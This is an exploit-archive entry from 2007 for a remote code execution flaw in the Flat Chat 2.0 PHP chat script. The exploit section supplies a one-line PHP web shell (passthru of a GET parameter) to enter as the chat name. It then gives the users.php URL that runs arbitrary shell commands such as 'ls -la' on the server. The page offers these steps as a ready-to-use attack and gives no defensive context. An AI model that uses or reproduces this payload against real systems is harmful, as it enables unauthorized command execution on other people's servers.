[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability
# Published : 2007-03-07
# Author : Dj7xpl
# Previous Title : PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability
# Next Title : Links Management Application 1.0 (lcnt) Remote SQL Injection Exploit
.-""""""""-.
/ Dj7xpl
| |
|, .-. .-. ,|
| )(_o/ o_)( |
|/ / |
(@_ (_ ^^ _)
_ ) _________|IIIIII|__/_______________________________
(_)@8@8{}<________|-IIIIII/-|________________________________>
)_/ /
(@
+_______________________________________________________________________________________________________________________+
+
+
+ +=============================================+
+ | |
+ | Portal : Flat Chat |
+ | Version : 2.0 |
+ | Author : Dj7xpl | Dj7xpl@yahoo.com |
+ | Download : Http://www.undoweb.frih.net |
+ | Risk : High (Remote Code Execution) |
+ | |
+ +=============================================+
+
+ Exploit :
+ Http://localhost/flatchat/index.php <<<<<< Open Index Page
+
+ Insert This Script In Chat Name: e.g: <?php passthru($_GET[cmd]); ?>
+
+ Http://localhost/flatchat/users.php?cmd=ls -la <<< Enter Your Command
+
+_______________________________________________________________________________________________________________________+
# www.Syue.com [2007-03-07]